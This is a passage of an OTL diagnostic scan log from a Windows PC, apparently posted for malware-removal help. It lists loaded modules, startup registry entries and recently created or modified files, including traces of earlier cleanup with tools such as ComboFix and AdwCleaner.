MOD - [2014/02/13 04:02:53 | 000,978,944 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\d17ceca243fabda73eefb21d9bd072df\System.Configuration.ni.dll
MOD - [2014/02/13 03:49:56 | 005,462,016 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\f87e71868aedbc6c4e8fe7160d17c4ab\System.Xml.ni.dll
MOD - [2014/02/13 03:49:40 | 012,434,432 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\d2b605fc7deda872727d1ed37710420e\System.Windows.Forms.ni.dll
MOD - [2014/02/13 03:49:31 | 001,593,344 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\8e6265a54260bddfc05951e764f5bc48\System.Drawing.ni.dll
MOD - [2014/02/13 03:49:17 | 006,622,208 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Data\6252b82373099322bef5f577bab408b6\System.Data.ni.dll
MOD - [2014/02/13 03:49:06 | 000,368,128 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\PresentationFramewo#\71e362b114f878201540696b6d66bf45\PresentationFramework.Aero.ni.dll
MOD - [2014/02/13 03:49:05 | 014,329,856 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\PresentationFramewo#\b46f1c203d1e4bec4597adf684ec1d41\PresentationFramework.ni.dll
MOD - [2014/02/13 03:48:46 | 012,218,880 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\PresentationCore\07d57714fff9db216537473f4a777f22\PresentationCore.ni.dll
MOD - [2014/02/13 03:48:32 | 003,325,440 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\WindowsBase\d981bccab40fbbdc1d35bf2a58c947b7\WindowsBase.ni.dll
MOD - [2014/02/13 03:48:28 | 007,977,984 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System\957628d9dd7b3bf370a56dca7835a997\System.ni.dll
MOD - [2014/02/13 03:48:21 | 011,497,984 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\694a37a84dee2cd2609a1dfab27c0433\mscorlib.ni.dll
MOD - [2013/01/28 13:08:56 | 000,087,952 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
MOD - [2013/01/28 13:08:28 | 001,242,512 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
MOD - [2009/04/11 06:28:21 | 000,368,640 | ---- | M] () -- C:\WINDOWS\SysWOW64\msjetoledb40.dll
MOD - [2009/04/11 02:04:15 | 000,113,664 | ---- | M] () -- C:\Windows\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll
MOD - [2009/03/30 04:42:19 | 000,261,632 | ---- | M] () -- C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll
MOD - [2009/03/30 04:42:17 | 002,933,760 | ---- | M] () -- C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll
MOD - [2008/07/03 11:45:00 | 000,032,768 | ---- | M] () -- C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Content.XmlSerializers.dll
MOD - [2008/07/03 11:42:56 | 000,007,168 | ---- | M] () -- C:\Program Files (x86)\Hewlett-Packard\HP Advisor\RemotingClient.dll
MOD - [2008/07/03 11:42:54 | 000,057,344 | ---- | M] () -- C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Pillars\PCAlerts\PCAlertsPillar.dll
MOD - [2008/07/03 11:42:48 | 000,114,688 | ---- | M] () -- C:\Program Files (x86)\Hewlett-Packard\HP Advisor\ECLibrary.dll
MOD - [2008/07/03 11:42:46 | 000,010,240 | ---- | M] () -- C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingClients.dll
MOD - [2008/07/03 11:42:40 | 000,040,960 | ---- | M] () -- C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingServer.dll
MOD - [2008/07/03 11:42:40 | 000,028,672 | ---- | M] () -- C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingMessages.dll
MOD - [2008/07/03 11:42:40 | 000,005,632 | ---- | M] () -- C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingInterface.dll
 
 
========== Services (SafeList) ==========
 
SRV:64bit: - [2012/10/21 09:36:16 | 000,121,856 | ---- | M] (ActMask Co.,Ltd - http://www.all2pdf.com)
O4:64bit: - HKLM..\Run: [Windows Defender] C:\Program Files\Windows Defender\MSASCui.exe (Microsoft Corporation)
O4 - HKLM..\Run: [APSDaemon] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)
O4 - HKLM..\Run: [HP Health Check Scheduler] c:\Program Files (x86)\Hewlett-Packard\HP Health Check\HPHC_Scheduler.exe (Hewlett-Packard)
O4 - HKLM..\Run: [hpsysdrv] c:\hp\support\hpsysdrv.exe (Hewlett-Packard Company)
O4 - HKLM..\Run: [KBD] C:\hp\KBD\KbdStub.exe ()
O4 - HKLM..\Run: [LifeCam] C:\Program Files (x86)\Microsoft LifeCam\LifeExp.exe (Microsoft Corporation)
O4 - HKLM..\Run: [OsdMaestro] c:\Program Files\Hewlett-Packard\On-Screen OSD Indicator\OSD64.exe (OsdMaestro)
O4 - HKU\S-1-5-21-465606687-3642172284-1488456202-1000..\Run: [GoogleDriveSync] "C:\Program Files (x86)\Google\Drive\googledrivesync.exe" /autostart File not found
O4 - HKLM..\RunOnce: [AvgUninstallURL] C:\Windows\SysWow64\cmd.exe (Microsoft Corporation)
O4 - HKU\.DEFAULT..\RunOnce: [spUninstallDeleteDir] rmdir /s /q "\SearchProtect" File not found
O4 - HKU\S-1-5-18..\RunOnce: [spUninstallDeleteDir] rmdir /s /q "\SearchProtect" File not found
O4 - Startup: C:\Users\Alan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe Gamma.lnk = C:\Program Files (x86)\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe (Adobe Systems, Inc.)
O4 - Startup: C:\Users\Alan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Tracker.lnk = C:\Program Files (x86)\Tracker\Tracker.exe ()
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O1364bit: - gopher Prefix: missing
O13 - gopher Prefix: missing
O15 - HKU\.DEFAULT\..Trusted Ranges: Range1 ([http] in Local intranet)
O15 - HKU\S-1-5-18\..Trusted Ranges: Range1 ([http] in Local intranet)
O15 - HKU\S-1-5-21-465606687-3642172284-1488456202-1000\..Trusted Ranges: Range1 ([http] in Local intranet)
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/update/1.7.0/jinstall-1_7_0_17-windows-i586.cab (Reg Error: Key error.)
O16 - DPF: {CAFEEFAC-0017-0000-0017-ABCDEFFEDCBA} http://java.sun.com/update/1.7.0/jinstall-1_7_0_17-windows-i586.cab (Reg Error: Key error.)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.7.0/jinstall-1_7_0_17-windows-i586.cab (Reg Error: Key error.)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.1.254
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{20DD8DB8-06EA-4D40-A3CC-B974B24382EB}: DhcpNameServer = 192.168.1.254
O18:64bit: - Protocol\Handler\grooveLocalGWS - No CLSID value found
O18:64bit: - Protocol\Handler\ms-help - No CLSID value found
O18:64bit: - Protocol\Handler\ms-itss - No CLSID value found
O18:64bit: - Protocol\Handler\skype4com - No CLSID value found
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O20:64bit: - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\WINDOWS\SysWOW64\userinit.exe (Microsoft Corporation)
O24 - Desktop WallPaper: C:\WINDOWS\Web\Wallpaper\awave.jpg
O24 - Desktop BackupWallPaper: C:\WINDOWS\Web\Wallpaper\awave.jpg
O32 - HKLM CDRom: AutoRun - 1
O34 - HKLM BootExecute: (autocheck autochk *)
O35:64bit: - HKLM\..comfile [open] -- "%1" %*
O35:64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:64bit: - HKLM\...com [@ = comfile] -- "%1" %*
O37:64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
 
========== Files/Folders - Created Within 30 Days ==========
 
[2014/03/28 16:48:54 | 000,000,000 | ---D | C] -- C:\_OTL
[2014/03/28 16:06:07 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\Alan\Desktop\OTL.exe
[2014/03/28 14:59:50 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\test
[2014/03/28 13:52:14 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\Futura Font
[2014/03/27 21:21:09 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\Stripe-Larry-Ullman
[2014/03/27 14:10:24 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\WP Page Speed
[2014/03/26 17:54:33 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\futura
[2014/03/26 16:44:50 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\wppagespeed
[2014/03/26 13:00:55 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\Alannah Optimized
[2014/03/25 17:04:26 | 001,038,974 | ---- | C] (Thisisu) -- C:\Users\Alan\Desktop\JRT (1).exe
[2014/03/25 17:00:52 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\171281
[2014/03/25 15:32:16 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\wp-whos-online
[2014/03/25 15:31:46 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\p2-likes
[2014/03/25 15:31:30 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\p2-by-email
[2014/03/24 19:00:03 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\PSDs
[2014/03/24 14:28:33 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\Tax Zone Plus
[2014/03/23 21:08:31 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\Sumil
[2014/03/23 20:09:56 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\Epray V2
[2014/03/21 03:03:22 | 000,000,000 | ---D | C] -- C:\ProgramData\Malwarebytes' Anti-Malware (portable)
[2014/03/21 02:51:51 | 000,091,352 | ---- | C] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mbamchameleon.sys
[2014/03/21 01:55:38 | 000,000,000 | -HSD | C] -- C:\$RECYCLE.BIN
[2014/03/21 01:52:24 | 000,518,144 | ---- | C] (SteelWerX) -- C:\Windows\SWREG.exe
[2014/03/21 01:52:24 | 000,406,528 | ---- | C] (SteelWerX) -- C:\Windows\SWSC.exe
[2014/03/21 01:52:24 | 000,060,416 | ---- | C] (NirSoft) -- C:\Windows\NIRCMD.exe
[2014/03/21 01:52:19 | 000,000,000 | --SD | C] -- C:\ComboFix
[2014/03/21 01:51:38 | 000,000,000 | --SD | C] -- C:\32788R22FWJFW
[2014/03/21 01:49:11 | 000,000,000 | ---D | C] -- C:\Qoobox
[2014/03/21 01:48:40 | 000,000,000 | ---D | C] -- C:\Windows\erdnt
[2014/03/21 01:32:49 | 000,000,000 | ---D | C] -- C:\Windows\ERUNT
[2014/03/21 01:20:44 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\VIRUS REMOVAL
[2014/03/21 01:18:41 | 000,000,000 | ---D | C] -- C:\AdwCleaner
[2014/03/21 00:32:16 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\VS Revo Group
[2014/03/21 00:32:16 | 000,000,000 | ---D | C] -- C:\Users\Alan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
[2014/03/18 21:20:48 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\Najlepsze Lokaty
[2014/03/17 00:13:07 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\Free Bitcoins Online
[2014/03/15 22:10:19 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\Master Resale
[2014/03/15 20:07:48 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Audacity
[2014/03/14 17:38:44 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
[2014/03/14 17:38:44 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\Skype
[2014/03/14 17:38:40 | 000,000,000 | R--D | C] -- C:\Program Files (x86)\Skype
[2014/03/13 20:56:36 | 000,000,000 | ---D | C] -- C:\ProgramData\Oracle
[2014/03/13 20:54:24 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
[2014/03/06 12:51:58 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\Undercover Tipster
[2014/03/05 14:59:04 | 000,000,000 | ---D | C] -- C:\Users\Alan\AppData\Local\Skype
 
========== Files - Modified Within 30 Days ==========
 
[2014/03/28 18:52:53 | 000,003,616 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
[2014/03/28 18:52:53 | 000,003,616 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
[2014/03/28 18:46:00 | 000,000,894 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2014/03/28 18:18:00 | 000,000,830 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2014/03/28 16:52:56 | 000,000,890 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2014/03/28 16:52:52 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2014/03/28 16:05:31 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Alan\Desktop\OTL.exe
[2014/03/28 14:55:18 | 000,003,933 | ---- | M] () -- C:\Users\Alan\Desktop\terms-in-comments.php
[2014/03/28 14:01:34 | 000,365,691 | ---- | M] () -- C:\Users\Alan\Desktop\Screen Shot 2014-03-28 at 9.49.56 AM.png
[2014/03/28 13:52:37 | 000,216,089 | ---- | M] () -- C:\Users\Alan\Desktop\Futura Font.zip
[2014/03/28 13:15:35 | 000,533,740 | ---- | M] () -- C:\Users\Alan\Desktop\Screen Shot 2014-03-28 at 9.14.22 AM.png
[2014/03/27 23:29:56 | 000,000,600 | ---- | M] () -- C:\Users\Alan\AppData\Local\PUTTY.RND
[2014/03/27 23:29:08 | 000,002,804 | ---- | M] () -- C:\Users\Alan\Desktop\bg.jpg
[2014/03/27 23:23:44 | 000,025,539 | ---- | M] () -- C:\Users\Alan\Desktop\bg.png
[2014/03/27 21:18:45 | 000,000,000 | ---- | M] () -- C:\Users\Alan\Desktop\page-checkout.php
[2014/03/27 19:58:58 | 000,007,276 | ---- | M] () -- C:\Users\Alan\Desktop\images.jpg
[2014/03/27 18:51:14 | 000,000,416 | ---- | M] () -- C:\Users\Alan\Desktop\close.png
[2014/03/27 18:51:08 | 000,000,715 | ---- | M] () -- C:\Users\Alan\Desktop\open.png
[2014/03/27 17:08:02 | 000,000,000 | ---- | M] () -- C:\Users\Alan\Desktop\sidebar.php
[2014/03/27 16:21:29 | 000,000,000 | ---- | M] () -- C:\Users\Alan\Desktop\page-speed-service.php
[2014/03/27 16:21:18 | 000,000,000 | ---- | M] () -- C:\Users\Alan\Desktop\page-faq.php
[2014/03/27 16:21:10 | 000,000,000 | ---- | M] () -- C:\Users\Alan\Desktop\page-custom-enquiry.php
[2014/03/27 16:20:54 | 000,000,000 | ---- | M] () -- C:\Users\Alan\Desktop\page-contact.php
[2014/03/26 21:29:57 | 000,023,552 | ---- | M] () -- C:\Users\Alan\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2014/03/26 21:29:54 | 001,713,132 | ---- | M] () -- C:\Users\Alan\Desktop\salesvideo.wmv
[2014/03/26 21:10:11 | 000,012,208 | ---- | M] () -- C:\Users\Alan\Desktop\google-page-speed.png
[2014/03/26 21:08:46 | 000,232,310 | ---- | M] () -- C:\Users\Alan\Desktop\new-google-logo-knockoff.png
[2014/03/26 21:07:22 | 000,004,881 | ---- | M] () -- C:\Users\Alan\Desktop\google-pagespeed-logo.png
[2014/03/26 21:03:10 | 000,005,210 | ---- | M] () -- C:\Users\Alan\Desktop\gtmetrix.png
[2014/03/26 19:44:25 | 000,008,033 | ---- | M] () -- C:\Users\Alan\Desktop\progress.gif
[2014/03/26 18:12:25 | 004,535,820 | ---- | M] () -- C:\Users\Alan\Desktop\TAXZONE PLUS Features Walk Through.pdf
[2014/03/26 15:35:03 | 000,000,260 | ---- | M] () -- C:\Users\Alan\Desktop\.htaccess
[2014/03/26 15:08:33 | 000,010,609 | ---- | M] () -- C:\Users\Alan\Desktop\scope_square-940x940.jpg
[2014/03/26 15:08:24 | 000,013,706 | ---- | M] () -- C:\Users\Alan\Desktop\2013-10-31-12.40.23-940x702.jpg
[2014/03/26 15:08:14 | 000,009,617 | ---- | M] () -- C:\Users\Alan\Desktop\photo26.jpg
[2014/03/26 15:08:05 | 000,015,124 | ---- | M] () -- C:\Users\Alan\Desktop\keyboard.jpg
[2014/03/26 15:07:55 | 000,011,675 | ---- | M] () -- C:\Users\Alan\Desktop\wordpress-logo-square.png
[2014/03/26 15:05:18 | 000,325,635 | ---- | M] () -- C:\Users\Alan\Desktop\2012-04-05-11.46.04.jpg
[2014/03/26 14:15:14 | 000,021,787 | ---- | M] () -- C:\Users\Alan\Desktop\screen.jpg
[2014/03/26 12:36:12 | 000,061,571 | ---- | M] () -- C:\Users\Alan\Desktop\RobInvoice.jpg
[2014/03/26 12:19:18 | 000,546,475 | ---- | M] () -- C:\Users\Alan\Desktop\hometopbg.jpg
[2014/03/26 12:15:30 | 000,000,000 | ---- | M] () -- C:\Users\Alan\Desktop\page-prayer-wall.php
[2014/03/25 17:04:23 | 001,038,974 | ---- | M] (Thisisu) -- C:\Users\Alan\Desktop\JRT (1).exe
[2014/03/25 17:01:22 | 001,179,320 | ---- | M] () -- C:\Users\Alan\Desktop\171281.zip
[2014/03/25 17:01:01 | 001,157,816 | ---- | M] () -- C:\Users\Alan\Desktop\171281.rar
[2014/03/25 16:25:37 | 000,053,594 | ---- | M] () -- C:\Users\Alan\Desktop\six.jpg
[2014/03/25 15:17:42 | 000,000,000 | ---- | M] () -- C:\Users\Alan\Desktop\squeeze-page-3.php
[2014/03/25 11:45:18 | 000,136,974 | ---- | M] () -- C:\Users\Alan\Desktop\style.css
[2014/03/25 11:39:37 | 000,019,846 | ---- | M] () -- C:\Users\Alan\Desktop\footerbg.png
[2014/03/25 11:22:27 | 000,000,000 | ---- | M] () -- C:\Users\Alan\Desktop\page-home.php
[2014/03/25 11:20:34 | 000,000,000 | ---- | M] () -- C:\Users\Alan\Desktop\new.css
[2014/03/25 10:45:19 | 000,003,680 | ---- | M] () -- C:\Users\Alan\Desktop\page-members.php
[2014/03/25 00:50:01 | 000,011,691 | ---- | M] () -- C:\Users\Alan\Desktop\411ce1_home_office_100.jpg
[2014/03/24 15:19:22 | 000,003,895 | ---- | M] () -- C:\Users\Alan\Desktop\small-nav-icon.png
[2014/03/22 17:30:10 | 000,010,434 | ---- | M] () -- C:\Users\Alan\Desktop\777coin.png
[2014/03/21 02:51:51 | 000,091,352 | ---- | M] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mbamchameleon.sys
[2014/03/21 01:51:15 | 000,000,085 | ---- | M] () -- C:\Windows\wininit.ini
[2014/03/21 01:29:24 | 005,290,840 | ---- | M] () -- C:\Windows\SysNative\FNTCACHE.DAT
[2014/03/15 20:07:56 | 000,000,808 | ---- | M] () -- C:\Users\Public\Desktop\Audacity.lnk
[2014/03/14 17:38:44 | 000,002,499 | ---- | M] () -- C:\Users\Public\Desktop\Skype.lnk
[2014/03/14 03:32:06 | 000,000,766 | ---- | M] () -- C:\Users\Alan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Tracker.lnk
[2014/03/03 18:45:31 | 000,000,600 | ---- | M] () -- C:\Users\Alan\AppData\Roaming\winscp.rnd
[2014/02/27 03:02:23 | 000,748,424 | ---- | M] () -- C:\Windows\SysWow64\PerfStringBackup.INI
[2014/02/27 03:02:23 | 000,637,216 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat
[2014/02/27 03:02:23 | 000,120,722 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat
[2014/02/27 03:02:15 | 000,748,424 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI
 
========== Files Created - No Company Name ==========
 
[2014/03/28 14:55:18 | 000,003,933 | ---- | C] () -- C:\Users\Alan\Desktop\terms-in-comments.php
[2014/03/28 14:00:51 | 000,365,691 | ---- | C] () -- C:\Users\Alan\Desktop\Screen Shot 2014-03-28 at 9.49.56 AM.png
[2014/03/28 13:52:37 | 000,216,089 | ---- | C] () -- C:\Users\Alan\Desktop\Futura Font.zip
[2014/03/28 13:15:15 | 000,533,740 | ---- | C] () -- C:\Users\Alan\Desktop\Screen Shot 2014-03-28 at 9.14.22 AM.png
[2014/03/27 23:29:08 | 000,002,804 | ---- | C] () -- C:\Users\Alan\Desktop\bg.jpg
[2014/03/27 23:23:44 | 000,025,539 | ---- | C] () -- C:\Users\Alan\Desktop\bg.png
[2014/03/27 21:18:45 | 000,000,000 | ---- | C] () -- C:\Users\Alan\Desktop\page-checkout.php
[2014/03/27 19:58:58 | 000,007,276 | ---- | C] () -- C:\Users\Alan\Desktop\images.jpg
[2014/03/27 19:07:15 | 001,431,354 | ---- | C] () -- C:\Users\Alan\Desktop\EmailNinja.pdf
[2014/03/27 18:51:14 | 000,000,416 | ---- | C] () -- C:\Users\Alan\Desktop\close.png
[2014/03/27 18:51:06 | 000,000,715 | ---- | C] () -- C:\Users\Alan\Desktop\open.png
[2014/03/27 17:08:02 | 000,000,000 | ---- | C] () -- C:\Users\Alan\Desktop\sidebar.php
[2014/03/27 16:21:29 | 000,000,000 | ---- | C] () -- C:\Users\Alan\Desktop\page-speed-service.php
[2014/03/27 16:21:18 | 000,000,000 | ---- | C] () -- C:\Users\Alan\Desktop\page-faq.php
[2014/03/27 16:21:10 | 000,000,000 | ---- | C] () -- C:\Users\Alan\Desktop\page-custom-enquiry.php
[2014/03/27 16:20:54 | 000,000,000 | ---- | C] () -- C:\Users\Alan\Desktop\page-contact.php
[2014/03/26 21:28:59 | 001,713,132 | ---- | C] () -- C:\Users\Alan\Desktop\salesvideo.wmv
[2014/03/26 21:10:11 | 000,012,208 | ---- | C] () -- C:\Users\Alan\Desktop\google-page-speed.png
[2014/03/26 21:08:46 | 000,232,310 | ---- | C] () -- C:\Users\Alan\Desktop\new-google-logo-knockoff.png
[2014/03/26 21:07:22 | 000,004,881 | ---- | C] () -- C:\Users\Alan\Desktop\google-pagespeed-logo.png
[2014/03/26 21:03:10 | 000,005,210 | ---- | C] () -- C:\Users\Alan\Desktop\gtmetrix.png
[2014/03/26 19:44:24 | 000,008,033 | ---- | C] () -- C:\Users\Alan\Desktop\progress.gif
[2014/03/26 18:11:56 | 004,535,820 | ---- | C] () -- C:\Users\Alan\Desktop\TAXZONE PLUS Features Walk Through.pdf
[2014/03/26 15:08:26 | 000,010,609 | ---- | C] () -- C:\Users\Alan\Desktop\scope_square-940x940.jpg
[2014/03/26 15:08:16 | 000,013,706 | ---- | C] () -- C:\Users\Alan\Desktop\2013-10-31-12.40.23-940x702.jpg
[2014/03/26 15:08:07 | 000,009,617 | ---- | C] () -- C:\Users\Alan\Desktop\photo26.jpg
[2014/03/26 15:07:58 | 000,015,124 | ---- | C] () -- C:\Users\Alan\Desktop\keyboard.jpg
[2014/03/26 15:07:47 | 000,011,675 | ---- | C] () -- C:\Users\Alan\Desktop\wordpress-logo-square.png
[2014/03/26 15:05:18 | 000,325,635 | ---- | C] () -- C:\Users\Alan\Desktop\2012-04-05-11.46.04.jpg
[2014/03/26 14:15:14 | 000,021,787 | ---- | C] () -- C:\Users\Alan\Desktop\screen.jpg
[2014/03/26 12:36:12 | 000,061,571 | ---- | C] () -- C:\Users\Alan\Desktop\RobInvoice.jpg
[2014/03/26 12:19:18 | 000,546,475 | ---- | C] () -- C:\Users\Alan\Desktop\hometopbg.jpg
[2014/03/26 12:15:30 | 000,000,000 | ---- | C] () -- C:\Users\Alan\Desktop\page-prayer-wall.php
[2014/03/25 17:01:22 | 001,179,320 | ---- | C] () -- C:\Users\Alan\Desktop\171281.zip
[2014/03/25 17:01:00 | 001,157,816 | ---- | C] () -- C:\Users\Alan\Desktop\171281.rar
[2014/03/25 16:25:35 | 000,053,594 | ---- | C] () -- C:\Users\Alan\Desktop\six.jpg
[2014/03/25 15:17:41 | 000,000,000 | ---- | C] () -- C:\Users\Alan\Desktop\squeeze-page-3.php
[2014/03/25 12:02:15 | 000,000,260 | ---- | C] () -- C:\Users\Alan\Desktop\.htaccess
[2014/03/25 11:44:53 | 000,136,974 | ---- | C] () -- C:\Users\Alan\Desktop\style.css
[2014/03/25 11:39:36 | 000,019,846 | ---- | C] () -- C:\Users\Alan\Desktop\footerbg.png
[2014/03/25 11:22:27 | 000,000,000 | ---- | C] () -- C:\Users\Alan\Desktop\page-home.php
[2014/03/25 11:20:34 | 000,000,000 | ---- | C] () -- C:\Users\Alan\Desktop\new.css
[2014/03/25 10:45:19 | 000,003,680 | ---- | C] () -- C:\Users\Alan\Desktop\page-members.php
[2014/03/25 00:50:00 | 000,011,691 | ---- | C] () -- C:\Users\Alan\Desktop\411ce1_home_office_100.jpg
[2014/03/24 15:19:21 | 000,003,895 | ---- | C] () -- C:\Users\Alan\Desktop\small-nav-icon.png
[2014/03/22 17:30:10 | 000,010,434 | ---- | C] () -- C:\Users\Alan\Desktop\777coin.png
[2014/03/21 01:52:24 | 000,256,000 | ---- | C] () -- C:\Windows\PEV.exe
[2014/03/21 01:52:24 | 000,208,896 | ---- | C] () -- C:\Windows\MBR.exe
[2014/03/21 01:52:24 | 000,098,816 | ---- | C] () -- C:\Windows\sed.exe
[2014/03/21 01:52:24 | 000,080,412 | ---- | C] () -- C:\Windows\grep.exe
[2014/03/21 01:52:24 | 000,068,096 | ---- | C] () -- C:\Windows\zip.exe
[2014/03/21 01:51:10 | 000,000,085 | ---- | C] () -- C:\Windows\wininit.ini
[2014/03/15 20:07:56 | 000,000,820 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Audacity.lnk
[2014/03/15 20:07:56 | 000,000,808 | ---- | C] () -- C:\Users\Public\Desktop\Audacity.lnk
[2014/03/14 17:38:44 | 000,002,499 | ---- | C] () -- C:\Users\Public\Desktop\Skype.lnk
[2013/12/20 23:23:07 | 001,391,616 | ---- | C] () -- C:\Windows\SysWow64\ActPDF.dll
[2013/10/01 13:03:01 | 000,000,028 | ---- | C] () -- C:\Users\Alan\.gitconfig
[2013/05/23 22:28:21 | 000,001,456 | ---- | C] () -- C:\Users\Alan\AppData\Local\Adobe Save for Web 13.0 Prefs
[2013/04/25 23:32:54 | 000,748,424 | ---- | C] () -- C:\Windows\SysWow64\PerfStringBackup.INI
[2013/04/25 23:32:32 | 000,000,023 | ---- | C] () -- C:\Windows\ODBCINST.INI
[2013/02/24 17:37:10 | 000,000,600 | ---- | C] () -- C:\Users\Alan\AppData\Roaming\winscp.rnd
[2012/09/02 10:59:14 | 001,036,288 | ---- | C] () -- C:\Windows\SysWow64\lxdwdrs.dll
[2012/09/02 10:59:14 | 000,081,920 | ---- | C] () -- C:\Windows\SysWow64\lxdwcaps.dll
[2012/09/02 10:59:14 | 000,069,632 | ---- | C] () -- C:\Windows\SysWow64\lxdwcnv4.dll
[2012/07/15 12:18:24 | 000,023,552 | ---- | C] () -- C:\Users\Alan\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2012/06/08 22:25:27 | 000,000,600 | ---- | C] () -- C:\Users\Alan\AppData\Local\PUTTY.RND
[2011/05/13 13:08:58 | 000,000,680 | ---- | C] () -- C:\Users\Alan\AppData\Local\d3d9caps.dat
[2011/03/29 09:38:49 | 000,013,078 | ---- | C] () -- C:\Users\Alan\AppData\Roaming\wklnhst.dat
